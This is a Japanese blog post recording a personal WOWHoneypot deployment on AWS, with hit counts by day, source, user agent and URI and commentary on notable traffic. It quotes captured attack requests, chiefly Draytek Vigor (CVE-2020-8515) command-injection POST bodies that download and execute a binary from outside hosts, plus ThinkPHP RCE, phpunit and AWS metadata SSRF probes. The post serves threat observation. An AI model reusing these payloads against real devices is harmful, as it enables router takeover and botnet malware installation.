akkietech’s diary

セキュリティ関連メインの自分用メモ書き。twitter: @akkietech

WOWHoneypotはじめてみた

ハニーポット

■経緯

OSCP取得から、かなり気持ち的にも余裕が出てきたので。

如何せんはじめてなもので、色々ググりました。
AWSでT-Potから始めてもよかったんだが、若干コストがかかる感じだったので、
スモールスタートということでWOWHoneypotを使うこととしました。

WOWHoneypotといえば、ハニーポッターの著書でおなじみのmorihisaさんが初心者向けに作成されたもので、githubにて公開されています。

https://github.com/morihisa/WOWHoneypot

AWSでアカウント登録することで得られる無料枠を利用して、こちらのWOWHoneypotを設置していくこととしました。

設置については他の方々がブログで詳細に分かりやすく解説されているので、ググって参考にしていただければと思います。

インスタンスのリージョンは無難に東京としました。

■捕捉状況

5/4〜5/9までの捕捉状況です。

日別

131 : 2020-05-06
126 : 2020-05-09
112 : 2020-05-08
104 : 2020-05-07
98 : 2020-05-05
53 : 2020-05-04
total : 624

送信元別 (上位10)

48 : 205.185.123.189
45 : 44.225.84.206
45 : 44.224.22.196
45 : 103.40.102.148
19 : 5.101.0.209
16 : 195.54.160.121
14 : 77.247.108.77
10 : 173.212.213.46
9 : 154.113.16.226
9 : 62.234.81.215

ユーザエージェント別 (上位20)

60 : AWS Security Scanner
45 : Mozilla/3.0 (compatible; Indy Library)
35 : Mozilla/5.0 zgrab/0.x
35 : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
29 : Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
24 : Python-urllib/2.7
22 : Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
19 : Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
19 : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
18 : Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; hxxp://cloudsystemnetworks.com)
17 : Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
14 : python-requests/2.21.0
13 : masscan/1.0 (hxxps://github.com/robertdavidgraham/masscan)
13 : Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
13 : Go-http-client/1.1
12 : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
12 : ZmEu
10 : Mozilla/5.0
8 : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 : XTC

リクエスURI別 (上位20)

283 : /
70 : /manager/html
24 : /is_test
12 : /latest/dynamic/instance-identity/document
9 : /TP/public/index.php
9 : /hudson
8 : /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
8 : /TP/public/index.php?s=captcha
8 : /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
6 : hxxp://example.com/
6 : hxxp://169.254.169.254/
6 : hxxp://[::ffff:a9fe:a9fe]/
6 : hxxp://169.254.169.254/latest/dynamic/instance-identity/document
6 : hxxp://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document
6 : /logs
6 : /editConfig?returnUrl=/
6 : /cgi-bin/mainfunction.cgi
6 : hxxp://checkip.amazonaws.com/
6 : checkip.amazonaws.com:443
5 : [自サーバIP]:80

各検知数を載せたところで少し面白くないので、
気になったものをいくつかピックアップしていきます。
取り上げたいものが多いので数絞って残りはまた今度とする。

AWS Security Scanner、悪意ある?ない?

検知日数:
5/4〜5/6 (ハニポ開始直後の3日間)

User-Agent: 

60 : AWS Security Scanner

Request URL: 

12 : /latest/dynamic/instance-identity/document
6 : hxxp://169.254.169.254/
6 : hxxp://[::ffff:a9fe:a9fe]/
6 : hxxp://169.254.169.254/latest/dynamic/instance-identity/document
6 : hxxp://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document
6 : hxxp://checkip.amazonaws.com/
6 : checkip.amazonaws.com:443

送信元IPアドレス

45 : 44.225.84.206
45 : 44.224.22.196

最初の3日間だけ検知していたAWS Security Scannerによるアクセス。
送信元は上記の2件からのみでキリよく45件ずつ。
そしてWebサーバのIPアドレスAWSメタデータを取得するためのURLに対するリクエストがきれいに6件ずつきている。

これはAWSインスタンス立てたときに来るお決まりのものなのか?笑

ただ去年くらいにCapital Oneの情報流出の事件は、SSRF攻撃 (サーバサイドリクエストフォージェリ)の手法を用いてAWSメタデータが取得され、結果としてS3へのアクセスを許し情報流出につながった。
確かそんな事件だった気がするが、AWSメタデータが取得されることはこの事件からも恐ろしさがわかるので気をつけないといけない。

■Draytek Vigorデバイス脆弱性(CVE-2020-8515)を狙った通信

User-Agent:

5 : XTC

Request URL: 

6 : /cgi-bin/mainfunction.cgi

POST data:

action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'wget${IFS}hxxp://176.123.3.96/arm7${IFS}-O${IFS}/tmp/upnp.debug;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug;${IFS}/tmp/upnp.debug'%0A%27&loginUser=a&loginPwd=a
action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'wget${IFS}hxxp://212.114.52.128/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'%0A%27&loginUser=a&loginPwd=a
action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'wget${IFS}hxxp://178.33.64.107/arm7${IFS}-O${IFS}/tmp/upnp.debug;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug;${IFS}/tmp/upnp.debug'%0A%27&loginUser=a&loginPwd=a
action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'wget${IFS}hxxp://178.33.64.107/arm7${IFS}-O${IFS}/tmp/upnp.debug;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug;${IFS}/tmp/upnp.debug'%0A%27&loginUser=a&loginPwd=a
action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'wget${IFS}hxxp://178.33.64.107/arm7${IFS}-O${IFS}/tmp/upnp.debug;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug;${IFS}/tmp/upnp.debug'%0A%27&loginUser=a&loginPwd=a


2020年2月ごろに公開されたDraytek Vigorデバイス脆弱性を狙った通信です。
XTCボットネットに関連するユーザエージェントのようで、Mirai亜種での活動でも確認されたことがあるようですね。(Threat post以外のソースが見つかりませんが。)

PaloAlto社のunit42ブログでもこれらのリクエストに関連する記事が書かれていますね。
https://unit42.paloaltonetworks.jp/new-hoaxcalls-ddos-botnet/

この記事でDraytek Vigorデバイスを狙った通信について言及されていますが、並行してGrandstream UCM6200の脆弱性(CVE-2020-5722)を狙った攻撃についても触れられています。

ExploitDatabaseで調べたところUCM6200のRCEのPoC(https://www.exploit-db.com/exploits/48247)もあり、私のハニーポットでもどうやら検知しているようでした。

GET /cgi?action=getInfo HTTP/1.1

該当期間のうち検知は2件だけでしたが。

■ まとめ

今日はこれくらいにしておきます。
やっぱりいろいろホイホイ捕まってるのを観察しているのは楽しいですね。
ThinkPHPとかTomcatとか見慣れたものを検知しておりますが、また今度に。
今後は日次の検知数だけでも更新していくか、週次の方がやりやすいのか。まぁ気軽にやっていきます。